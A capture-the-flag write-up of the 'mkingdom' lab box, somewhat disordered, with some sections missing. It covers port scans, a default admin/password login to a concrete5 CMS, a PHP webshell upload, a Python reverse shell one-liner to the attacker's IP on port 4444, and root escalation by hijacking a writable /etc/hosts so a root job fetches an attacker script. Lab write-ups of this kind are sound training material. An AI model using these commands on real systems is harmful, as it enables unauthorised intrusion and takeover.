The following post by anthonyjsaab is licensed under
0 - Introduction
1 - Port Scans
1a - Discovery
root@ip-10-10-159-131:~# nmap -sS -T4 -p- mkingdom.thm
Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-15 05:44 BST
Nmap scan report for mkingdom.thm (10.10.203.199)
Host is up (0.00041s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
85/tcp open mit-ml-dev
MAC Address: 02:27:F9:0F:DC:CF (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1433.84 seconds
1b - Versions and OS
root@ip-10-10-159-131:~# nmap -A -p85 mkingdom.thm
Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-15 06:18 BST
Nmap scan report for mkingdom.thm (10.10.203.199)
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
85/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0H N0! PWN3D 4G4IN
MAC Address: 02:27:F9:0F:DC:CF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (99%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Android 5.1 (92%), Linux 3.2 - 3.10 (92%), Linux 3.2 - 3.16 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms mkingdom.thm (10.10.203.199)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.76 seconds
root@ip-10-10-159-131:~#
The only working section I have not mentioned yet is the Login page:
Immediately after finding this page (link available on landing page), I ran Burp's Intruder to brute force the password (we know the user is admin based on the blog post's author). However, my IP was quickly banned. Then, I sorta forgot about this page until I went out of leads. I then tried an obvious combination: admin admin. Didn't work. admin password? YES! WE ARE IN!
2d - Foothold
Now I knew what to do: I have to upload a PHP webshell.
I went into "System & Settings". Under the "Files" sections, we have a link to "Allowed File Types".
We now go to the file's URL indicated above:
After taking a look at the /home directory, we notice that there are two accounts we can try to break into: toad and mario
3 - From www-data to toad
3a - Upgrading webshell to full shell
In the webshell, I ran this command built using revshells.com:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.11.85.12",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
An nc listener catches the shell. Then a few well-known commands upgrades the shell
PWD_token seemed to be base64 encoded. After decoding it, it was gibberish. However, I sensed that it could possibly be mario's password. I tried it and it worked!
toad@mkingdom:/tmp$ su mario
Password:
mario@mkingdom:/tmp$
5 - From mario to root
Here, privilege escalation was not easy at all. At first, I tried some enumerations like the following:
mario@mkingdom:/tmp$ sudo -l
[sudo] password for mario:
Matching Defaults entries for mario on mkingdom:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
pwfeedback
User mario may run the following commands on mkingdom:
(ALL) /usr/bin/id
All of the classical privesc vectors were dead ends. Then, I tried to check for something only mario could do or own:
mario@mkingdom:/tmp$ ls -la /etc/ | grep mario
-rw-rw-r-- 1 root mario 342 Jan 26 19:53 hosts
That was quite unusual! Why would we have write access to /etc/hosts? Inside, we can find:
mario@mkingdom:/tmp$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 mkingdom.thm
127.0.0.1 backgroundimages.concrete5.org
127.0.0.1 www.concrete5.org
127.0.0.1 newsflow.concrete5.org
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
This is very dangerous. It means that every app that relies on /etc/hosts to translate some address to 127.0.0.1 can be fooled to talk to us instead!
I tried this for starters:
www-data@mkingdom:/$ cat /etc/hosts
127.0.0.1 localhost
10.11.85.12 mkingdom.thm
127.0.0.1 backgroundimages.concrete5.org
127.0.0.1 www.concrete5.org
127.0.0.1 newsflow.concrete5.org
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
I opened Wireshark on Kali, looked at the traffic of tun0 and waited for a bit, until:
Some unknown process on the target machine is now trying to contact us on port 85! The DNS hijacking worked!
When I opened an HTTP server on port 85, I received the connection again:
โโโ(kaliใฟkali)-[~]
โโ$ python3 -m http.server 85
Serving HTTP on 0.0.0.0 port 85 (http://0.0.0.0:85/) ...
10.10.188.161 - - [16/Jun/2024 15:20:01] code 404, message File not found
10.10.188.161 - - [16/Jun/2024 15:20:01] "GET /app/castle/application/counter.sh HTTP/1.1" 404 -
I quickly created a Bash script that spawns a reverse shell to Kali:
The CMS used appears to be concrete5 - 8.5.2. Searching for vulnerabilities for this particular CMS version does not yield useful results. It's Github repo does not show any commits that fixed some vulnerability.
After adding PHP, I went to "Files" and uploaded .
